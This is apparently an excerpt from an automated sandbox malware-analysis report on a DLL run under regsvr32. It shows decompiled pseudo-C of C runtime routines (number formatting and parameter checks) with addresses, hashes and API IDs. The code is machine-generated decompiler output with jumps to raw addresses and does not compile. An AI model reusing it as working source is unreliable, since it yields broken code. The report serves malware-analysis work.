                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1, _v64) == 0) goto 0x65d0575b;
                                                                                                                                            				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                                                                                                                            				_t175 = _v64;
                                                                                                                                            				E00007FFC7FFC65D05B30(_t100,  *_t175,  &(_a32[2]));
                                                                                                                                            				 *_v64 = _t175;
                                                                                                                                            				goto 0x65d05760;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_t175);
                                                                                                                                            				goto 0x65d0595a;
                                                                                                                                            				if (( *_a32 & 0x00000001) == 0) goto 0x65d05813;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x65d05809;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1, _v64) == 0) goto 0x65d05809;
                                                                                                                                            				_t107 = E00007FFC7FFC65CFC410(__ecx, E00007FFC7FFC65D0D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                                                                                                                            				if (_a32[5] != 8) goto 0x65d05807;
                                                                                                                                            				if ( *_v64 == 0) goto 0x65d05807;
                                                                                                                                            				_t186 = _v64;
                                                                                                                                            				E00007FFC7FFC65D05B30(_t107,  *_t186,  &(_a32[2]));
                                                                                                                                            				 *_v64 = _t186;
                                                                                                                                            				goto 0x65d0580e;
                                                                                                                                            				_t109 = E00007FFC7FFC65CFCF80(_t186);
                                                                                                                                            				goto 0x65d0595a;
                                                                                                                                            				_t187 = _a32;
                                                                                                                                            				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0x65d0583c;
                                                                                                                                            				E00007FFC7FFC65CFE6A0(_t109, _t187);
                                                                                                                                            				_v40 = _t187 + _a32[6];
                                                                                                                                            				goto 0x65d05845;
                                                                                                                                            				_v40 = 0;
                                                                                                                                            				if (_v40 != 0) goto 0x65d058c6;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x65d058bc;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1, _v64) == 0) goto 0x65d058bc;
                                                                                                                                            				_t191 = _a32[5];
                                                                                                                                            				_v32 = _a32[5];
                                                                                                                                            				E00007FFC7FFC65D05B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                                                                                                                            				E00007FFC7FFC65CFC410(__ecx, E00007FFC7FFC65D0D2C0(1, _v64), _v64, _a32[5], _v32);
                                                                                                                                            				goto 0x65d058c1;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_t191);
                                                                                                                                            				goto 0x65d0595a;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x65d05955;
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1, _v64) == 0) goto 0x65d05955;
                                                                                                                                            				_t193 = _a32;
                                                                                                                                            				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0x65d05919;
                                                                                                                                            				E00007FFC7FFC65CFE6A0(_t117, _t193);
                                                                                                                                            				_v24 = _t193 + _a32[6];
                                                                                                                                            				goto 0x65d05922;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				if (E00007FFC7FFC65D0D2F0(_v24) == 0) goto 0x65d05955;
                                                                                                                                            				_t195 = _a32;
                                                                                                                                            				if (( *_a32 & 0x00000004) == 0) goto 0x65d0594b;
                                                                                                                                            				_v72 = 2;
                                                                                                                                            				goto 0x65d05953;
                                                                                                                                            				_v72 = 1;
                                                                                                                                            				goto 0x65d0595a;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_a32);
                                                                                                                                            				E00007FFC7FFC65CFCF50(_t195);
                                                                                                                                            				return _v72;
                                                                                                                                            			}




















                                                                                                                                            0x7ffc65d055f0
                                                                                                                                            0x7ffc65d055f5
                                                                                                                                            0x7ffc65d055fa
                                                                                                                                            0x7ffc65d055ff
                                                                                                                                            0x7ffc65d05608
                                                                                                                                            0x7ffc65d05610
                                                                                                                                            0x7ffc65d0561c
                                                                                                                                            0x7ffc65d0561e
                                                                                                                                            0x7ffc65d05632
                                                                                                                                            0x7ffc65d05637
                                                                                                                                            0x7ffc65d05639
                                                                                                                                            0x7ffc65d05648
                                                                                                                                            0x7ffc65d0564a
                                                                                                                                            0x7ffc65d05656
                                                                                                                                            0x7ffc65d05658
                                                                                                                                            0x7ffc65d0566c
                                                                                                                                            0x7ffc65d05671
                                                                                                                                            0x7ffc65d05673
                                                                                                                                            0x7ffc65d05687
                                                                                                                                            0x7ffc65d05695
                                                                                                                                            0x7ffc65d056a8
                                                                                                                                            0x7ffc65d056ac
                                                                                                                                            0x7ffc65d056c2
                                                                                                                                            0x7ffc65d056c9
                                                                                                                                            0x7ffc65d056ce
                                                                                                                                            0x7ffc65d056e4
                                                                                                                                            0x7ffc65d056f8
                                                                                                                                            0x7ffc65d0570f
                                                                                                                                            0x7ffc65d05722
                                                                                                                                            0x7ffc65d05732
                                                                                                                                            0x7ffc65d05744
                                                                                                                                            0x7ffc65d0574c
                                                                                                                                            0x7ffc65d05756
                                                                                                                                            0x7ffc65d05759
                                                                                                                                            0x7ffc65d0575b
                                                                                                                                            0x7ffc65d05760
                                                                                                                                            0x7ffc65d05774
                                                                                                                                            0x7ffc65d0578f
                                                                                                                                            0x7ffc65d057a2
                                                                                                                                            0x7ffc65d057c1
                                                                                                                                            0x7ffc65d057d6
                                                                                                                                            0x7ffc65d057e1
                                                                                                                                            0x7ffc65d057f2
                                                                                                                                            0x7ffc65d057fa
                                                                                                                                            0x7ffc65d05804
                                                                                                                                            0x7ffc65d05807
                                                                                                                                            0x7ffc65d05809
                                                                                                                                            0x7ffc65d0580e
                                                                                                                                            0x7ffc65d05813
                                                                                                                                            0x7ffc65d0581f
                                                                                                                                            0x7ffc65d05821
                                                                                                                                            0x7ffc65d05835
                                                                                                                                            0x7ffc65d0583a
                                                                                                                                            0x7ffc65d0583c
                                                                                                                                            0x7ffc65d0584b
                                                                                                                                            0x7ffc65d05862
                                                                                                                                            0x7ffc65d05875
                                                                                                                                            0x7ffc65d0587f
                                                                                                                                            0x7ffc65d05883
                                                                                                                                            0x7ffc65d058a0
                                                                                                                                            0x7ffc65d058b5
                                                                                                                                            0x7ffc65d058ba
                                                                                                                                            0x7ffc65d058bc
                                                                                                                                            0x7ffc65d058c1
                                                                                                                                            0x7ffc65d058db
                                                                                                                                            0x7ffc65d058ee
                                                                                                                                            0x7ffc65d058f0
                                                                                                                                            0x7ffc65d058fc
                                                                                                                                            0x7ffc65d058fe
                                                                                                                                            0x7ffc65d05912
                                                                                                                                            0x7ffc65d05917
                                                                                                                                            0x7ffc65d05919
                                                                                                                                            0x7ffc65d0592e
                                                                                                                                            0x7ffc65d05930
                                                                                                                                            0x7ffc65d0593f
                                                                                                                                            0x7ffc65d05941
                                                                                                                                            0x7ffc65d05949
                                                                                                                                            0x7ffc65d0594b
                                                                                                                                            0x7ffc65d05953
                                                                                                                                            0x7ffc65d05955
                                                                                                                                            0x7ffc65d0595c
                                                                                                                                            0x7ffc65d0596a

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 801082872-0
                                                                                                                                            • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                                                                            • Instruction ID: d54b3111de6306a52e8551cb5f633c181071a1d07b560b5f7c884c6b7ef9e375
                                                                                                                                            • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                                                                            • Instruction Fuzzy Hash: 33A1EA22A0CA5AC2EB649F15E59036A67A0FBC4F94F644931DE8D877E5DF3CD441CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                                                                                                            • API String ID: 2123368286-1993839260
                                                                                                                                            • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                                                                            • Instruction ID: 6ff3433c591ee54af3cd26c396427b133209d6fccb5d5ba1892422918fe7b86f
                                                                                                                                            • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                                                                            • Instruction Fuzzy Hash: ABE18D32A0C79ADAE7648F14E64436AB3A1FB84B44F600935E68D83BE9DF7DD444CB11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                                                                                                            • API String ID: 2123368286-1853640030
                                                                                                                                            • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                                                                            • Instruction ID: 3ca359cd059a5ba86e910f6680befdb5a7194afdd150978e636721f81fb5d8ec
                                                                                                                                            • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                                                                            • Instruction Fuzzy Hash: C5E18E32A0C799EAE7648F14E6403AAB7A1FB84B44F600835E68D47BE9CF7DD444CB11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 22%
                                                                                                                                            			E00007FFC7FFC65D0E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                                                                                            				signed int _t224;
                                                                                                                                            				signed char _t229;
                                                                                                                                            				void* _t260;
                                                                                                                                            				intOrPtr _t268;
                                                                                                                                            				signed int _t342;
                                                                                                                                            				signed int _t343;
                                                                                                                                            				signed long long _t346;
                                                                                                                                            				intOrPtr* _t365;
                                                                                                                                            				intOrPtr* _t370;
                                                                                                                                            				signed long long _t400;
                                                                                                                                            
                                                                                                                                            				_t342 = __rax;
                                                                                                                                            				_a80 = _a80 | 0x00000040;
                                                                                                                                            				_a72 = 0xa;
                                                                                                                                            				_a72 = 0xa;
                                                                                                                                            				_a116 = 0x10;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				_a1220 = 7;
                                                                                                                                            				_a1220 = 0x27;
                                                                                                                                            				_a72 = 0x10;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0e74d;
                                                                                                                                            				_a84 = 0x30;
                                                                                                                                            				_a86 = _a1220 + 0x51;
                                                                                                                                            				_a92 = 2;
                                                                                                                                            				_a72 = 8;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0e770;
                                                                                                                                            				asm("bts eax, 0x9");
                                                                                                                                            				if ((_a80 & 0x00008000) == 0) goto 0x65d0e797;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1560);
                                                                                                                                            				_a1304 = _t342;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				if ((_a80 & 0x00001000) == 0) goto 0x65d0e7be;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1560);
                                                                                                                                            				_a1304 = _t342;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				if ((_a80 & 0x00000020) == 0) goto 0x65d0e809;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0e7ef;
                                                                                                                                            				_t343 = E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t343;
                                                                                                                                            				goto 0x65d0e807;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t343;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0e82d;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t343;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1560);
                                                                                                                                            				_a1304 = _t343;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0e87b;
                                                                                                                                            				if (_a1304 >= 0) goto 0x65d0e87b;
                                                                                                                                            				_a1312 =  ~_a1304;
                                                                                                                                            				asm("bts eax, 0x8");
                                                                                                                                            				goto 0x65d0e88b;
                                                                                                                                            				_t346 = _a1304;
                                                                                                                                            				_a1312 = _t346;
                                                                                                                                            				if ((_a80 & 0x00008000) != 0) goto 0x65d0e8c0;
                                                                                                                                            				if ((_a80 & 0x00001000) != 0) goto 0x65d0e8c0;
                                                                                                                                            				_a1312 = _a1312 & _t346;
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0e8d1;
                                                                                                                                            				_a116 = 1;
                                                                                                                                            				goto 0x65d0e8ee;
                                                                                                                                            				_a80 = _a80 & 0xfffffff7;
                                                                                                                                            				if (_a116 - 0x200 <= 0) goto 0x65d0e8ee;
                                                                                                                                            				_a116 = 0x200;
                                                                                                                                            				if (_a1312 != 0) goto 0x65d0e901;
                                                                                                                                            				_a92 = 0;
                                                                                                                                            				_a64 =  &_a687;
                                                                                                                                            				_t224 = _a116;
                                                                                                                                            				_a116 = _a116 - 1;
                                                                                                                                            				if (_t224 > 0) goto 0x65d0e92f;
                                                                                                                                            				if (_a1312 == 0) goto 0x65d0e9cc;
                                                                                                                                            				_a1480 = _a72;
                                                                                                                                            				_a1296 = _t224 / _a1480 + 0x30;
                                                                                                                                            				_a1488 = _a72;
                                                                                                                                            				if (_a1296 - 0x39 <= 0) goto 0x65d0e9ab;
                                                                                                                                            				_t229 = _a1296 + _a1220;
                                                                                                                                            				_a1296 = _t229;
                                                                                                                                            				 *_a64 = _a1296 & 0x000000ff;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				goto 0x65d0e90e;
                                                                                                                                            				_a104 = _t229;
                                                                                                                                            				_a64 = _a64 + 1;
                                                                                                                                            				if ((_a80 & 0x00000200) == 0) goto 0x65d0ea2a;
                                                                                                                                            				if (_a104 == 0) goto 0x65d0ea0b;
                                                                                                                                            				if ( *_a64 == 0x30) goto 0x65d0ea2a;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				 *_a64 = 0x30;
                                                                                                                                            				_a104 = _a104 + 1;
                                                                                                                                            				if (_a108 != 0) goto 0x65d0ec7c;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0ea9d;
                                                                                                                                            				if ((_a80 & 0x00000100) == 0) goto 0x65d0ea61;
                                                                                                                                            				_a84 = 0x2d;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ea9d;
                                                                                                                                            				if ((_a80 & 0x00000001) == 0) goto 0x65d0ea80;
                                                                                                                                            				_a84 = 0x2b;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ea9d;
                                                                                                                                            				if ((_a80 & 0x00000002) == 0) goto 0x65d0ea9d;
                                                                                                                                            				_a84 = 0x20;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				_a1320 = _a88 - _a104 - _a92;
                                                                                                                                            				if ((_a80 & 0x0000000c) != 0) goto 0x65d0eadf;
                                                                                                                                            				E00007FFC7FFC65D0EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                                                                            				E00007FFC7FFC65D0EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                                                                                            				if ((_a80 & 0x00000008) == 0) goto 0x65d0eb33;
                                                                                                                                            				if ((_a80 & 0x00000004) != 0) goto 0x65d0eb33;
                                                                                                                                            				E00007FFC7FFC65D0EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                                                                                            				if (_a76 != 0) goto 0x65d0ec29;
                                                                                                                                            				if (_a104 <= 0) goto 0x65d0ec29;
                                                                                                                                            				_t365 = _a64;
                                                                                                                                            				_a1328 = _t365;
                                                                                                                                            				_a1336 = _a104;
                                                                                                                                            				_a1336 = _a1336 - 1;
                                                                                                                                            				if (_a1336 <= 0) goto 0x65d0ec27;
                                                                                                                                            				_t260 = E00007FFC7FFC65CF6840(_a1336,  &_a120);
                                                                                                                                            				_a1496 = _t365;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t260,  &_a120);
                                                                                                                                            				_a1340 = E00007FFC7FFC65D0F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                                                                                                                            				if (_a1340 > 0) goto 0x65d0ebe7;
                                                                                                                                            				_a1200 = 0xffffffff;
                                                                                                                                            				goto 0x65d0ec27;
                                                                                                                                            				E00007FFC7FFC65D0EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                                                                                            				_a1328 = _a1328 + _a1340;
                                                                                                                                            				goto 0x65d0eb61;
                                                                                                                                            				goto 0x65d0ec47;
                                                                                                                                            				E00007FFC7FFC65D0EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                                                                                            				if (_a1200 < 0) goto 0x65d0ec7c;
                                                                                                                                            				if ((_a80 & 0x00000004) == 0) goto 0x65d0ec7c;
                                                                                                                                            				E00007FFC7FFC65D0EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                                                                            				if (_a96 == 0) goto 0x65d0ec9c;
                                                                                                                                            				0x65cf5330();
                                                                                                                                            				_a96 = 0;
                                                                                                                                            				goto 0x65d0da75;
                                                                                                                                            				if (_a1216 == 0) goto 0x65d0ecc2;
                                                                                                                                            				if (_a1216 == 7) goto 0x65d0ecc2;
                                                                                                                                            				_a1504 = 0;
                                                                                                                                            				goto 0x65d0eccd;
                                                                                                                                            				_a1504 = 1;
                                                                                                                                            				_t268 = _a1504;
                                                                                                                                            				_a1344 = _t268;
                                                                                                                                            				if (_a1344 != 0) goto 0x65d0ed13;
                                                                                                                                            				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                                                                            				_a32 = _t370;
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0x8f5;
                                                                                                                                            				0x65cfb3b0();
                                                                                                                                            				if (_t268 != 1) goto 0x65d0ed13;
                                                                                                                                            				asm("int3");
                                                                                                                                            				if (_a1344 != 0) goto 0x65d0ed6f;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *_t370 = 0x16;
                                                                                                                                            				_a32 = 0;
                                                                                                                                            				r9d = 0x8f5;
                                                                                                                                            				E00007FFC7FFC65CFBD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            				_a1376 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				goto 0x65d0ed8e;
                                                                                                                                            				_a1380 = _a1200;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				return E00007FFC7FFC65CF3280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            			}













                                                                                                                                            0x7ffc65d0e6c6
                                                                                                                                            0x7ffc65d0e6cd
                                                                                                                                            0x7ffc65d0e6d1
                                                                                                                                            0x7ffc65d0e6de
                                                                                                                                            0x7ffc65d0e6eb
                                                                                                                                            0x7ffc65d0e6f7
                                                                                                                                            0x7ffc65d0e6ff
                                                                                                                                            0x7ffc65d0e70c
                                                                                                                                            0x7ffc65d0e717
                                                                                                                                            0x7ffc65d0e72a
                                                                                                                                            0x7ffc65d0e731
                                                                                                                                            0x7ffc65d0e740
                                                                                                                                            0x7ffc65d0e745
                                                                                                                                            0x7ffc65d0e74f
                                                                                                                                            0x7ffc65d0e762
                                                                                                                                            0x7ffc65d0e768
                                                                                                                                            0x7ffc65d0e77b
                                                                                                                                            0x7ffc65d0e785
                                                                                                                                            0x7ffc65d0e78a
                                                                                                                                            0x7ffc65d0e792
                                                                                                                                            0x7ffc65d0e7a2
                                                                                                                                            0x7ffc65d0e7ac
                                                                                                                                            0x7ffc65d0e7b1
                                                                                                                                            0x7ffc65d0e7b9
                                                                                                                                            0x7ffc65d0e7c7
                                                                                                                                            0x7ffc65d0e7d2
                                                                                                                                            0x7ffc65d0e7e1
                                                                                                                                            0x7ffc65d0e7e5
                                                                                                                                            0x7ffc65d0e7ed
                                                                                                                                            0x7ffc65d0e7f7
                                                                                                                                            0x7ffc65d0e7ff
                                                                                                                                            0x7ffc65d0e807
                                                                                                                                            0x7ffc65d0e812
                                                                                                                                            0x7ffc65d0e81c
                                                                                                                                            0x7ffc65d0e823
                                                                                                                                            0x7ffc65d0e82b
                                                                                                                                            0x7ffc65d0e835
                                                                                                                                            0x7ffc65d0e83c
                                                                                                                                            0x7ffc65d0e84d
                                                                                                                                            0x7ffc65d0e858
                                                                                                                                            0x7ffc65d0e865
                                                                                                                                            0x7ffc65d0e871
                                                                                                                                            0x7ffc65d0e879
                                                                                                                                            0x7ffc65d0e87b
                                                                                                                                            0x7ffc65d0e883
                                                                                                                                            0x7ffc65d0e896
                                                                                                                                            0x7ffc65d0e8a3
                                                                                                                                            0x7ffc65d0e8b8
                                                                                                                                            0x7ffc65d0e8c5
                                                                                                                                            0x7ffc65d0e8c7
                                                                                                                                            0x7ffc65d0e8cf
                                                                                                                                            0x7ffc65d0e8d8
                                                                                                                                            0x7ffc65d0e8e4
                                                                                                                                            0x7ffc65d0e8e6
                                                                                                                                            0x7ffc65d0e8f7
                                                                                                                                            0x7ffc65d0e8f9
                                                                                                                                            0x7ffc65d0e909
                                                                                                                                            0x7ffc65d0e90e
                                                                                                                                            0x7ffc65d0e918
                                                                                                                                            0x7ffc65d0e91e
                                                                                                                                            0x7ffc65d0e929
                                                                                                                                            0x7ffc65d0e934
                                                                                                                                            0x7ffc65d0e957
                                                                                                                                            0x7ffc65d0e963
                                                                                                                                            0x7ffc65d0e990
                                                                                                                                            0x7ffc65d0e9a2
                                                                                                                                            0x7ffc65d0e9a4
                                                                                                                                            0x7ffc65d0e9b8
                                                                                                                                            0x7ffc65d0e9c2
                                                                                                                                            0x7ffc65d0e9c7
                                                                                                                                            0x7ffc65d0e9d9
                                                                                                                                            0x7ffc65d0e9e5
                                                                                                                                            0x7ffc65d0e9f5
                                                                                                                                            0x7ffc65d0e9fc
                                                                                                                                            0x7ffc65d0ea09
                                                                                                                                            0x7ffc65d0ea13
                                                                                                                                            0x7ffc65d0ea1d
                                                                                                                                            0x7ffc65d0ea26
                                                                                                                                            0x7ffc65d0ea2f
                                                                                                                                            0x7ffc65d0ea3e
                                                                                                                                            0x7ffc65d0ea4b
                                                                                                                                            0x7ffc65d0ea52
                                                                                                                                            0x7ffc65d0ea57
                                                                                                                                            0x7ffc65d0ea5f
                                                                                                                                            0x7ffc65d0ea6a
                                                                                                                                            0x7ffc65d0ea71
                                                                                                                                            0x7ffc65d0ea76
                                                                                                                                            0x7ffc65d0ea7e
                                                                                                                                            0x7ffc65d0ea89
                                                                                                                                            0x7ffc65d0ea90
                                                                                                                                            0x7ffc65d0ea95
                                                                                                                                            0x7ffc65d0eaad
                                                                                                                                            0x7ffc65d0eabd
                                                                                                                                            0x7ffc65d0eada
                                                                                                                                            0x7ffc65d0eaf8
                                                                                                                                            0x7ffc65d0eb06
                                                                                                                                            0x7ffc65d0eb11
                                                                                                                                            0x7ffc65d0eb2e
                                                                                                                                            0x7ffc65d0eb38
                                                                                                                                            0x7ffc65d0eb43
                                                                                                                                            0x7ffc65d0eb49
                                                                                                                                            0x7ffc65d0eb4e
                                                                                                                                            0x7ffc65d0eb5a
                                                                                                                                            0x7ffc65d0eb71
                                                                                                                                            0x7ffc65d0eb7a
                                                                                                                                            0x7ffc65d0eb85
                                                                                                                                            0x7ffc65d0eb8a
                                                                                                                                            0x7ffc65d0eb97
                                                                                                                                            0x7ffc65d0ebc9
                                                                                                                                            0x7ffc65d0ebd8
                                                                                                                                            0x7ffc65d0ebda
                                                                                                                                            0x7ffc65d0ebe5
                                                                                                                                            0x7ffc65d0ebff
                                                                                                                                            0x7ffc65d0ec1a
                                                                                                                                            0x7ffc65d0ec22
                                                                                                                                            0x7ffc65d0ec27
                                                                                                                                            0x7ffc65d0ec42
                                                                                                                                            0x7ffc65d0ec4f
                                                                                                                                            0x7ffc65d0ec5a
                                                                                                                                            0x7ffc65d0ec77
                                                                                                                                            0x7ffc65d0ec82
                                                                                                                                            0x7ffc65d0ec8e
                                                                                                                                            0x7ffc65d0ec93
                                                                                                                                            0x7ffc65d0ec9c
                                                                                                                                            0x7ffc65d0eca9
                                                                                                                                            0x7ffc65d0ecb3
                                                                                                                                            0x7ffc65d0ecb5
                                                                                                                                            0x7ffc65d0ecc0
                                                                                                                                            0x7ffc65d0ecc2
                                                                                                                                            0x7ffc65d0eccd
                                                                                                                                            0x7ffc65d0ecd4
                                                                                                                                            0x7ffc65d0ece3
                                                                                                                                            0x7ffc65d0ece5
                                                                                                                                            0x7ffc65d0ecec
                                                                                                                                            0x7ffc65d0ecf1
                                                                                                                                            0x7ffc65d0ecf4
                                                                                                                                            0x7ffc65d0ed06
                                                                                                                                            0x7ffc65d0ed0e
                                                                                                                                            0x7ffc65d0ed10
                                                                                                                                            0x7ffc65d0ed1b
                                                                                                                                            0x7ffc65d0ed1d
                                                                                                                                            0x7ffc65d0ed22
                                                                                                                                            0x7ffc65d0ed28
                                                                                                                                            0x7ffc65d0ed31
                                                                                                                                            0x7ffc65d0ed4c
                                                                                                                                            0x7ffc65d0ed51
                                                                                                                                            0x7ffc65d0ed61
                                                                                                                                            0x7ffc65d0ed6d
                                                                                                                                            0x7ffc65d0ed76
                                                                                                                                            0x7ffc65d0ed82
                                                                                                                                            0x7ffc65d0eda5

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
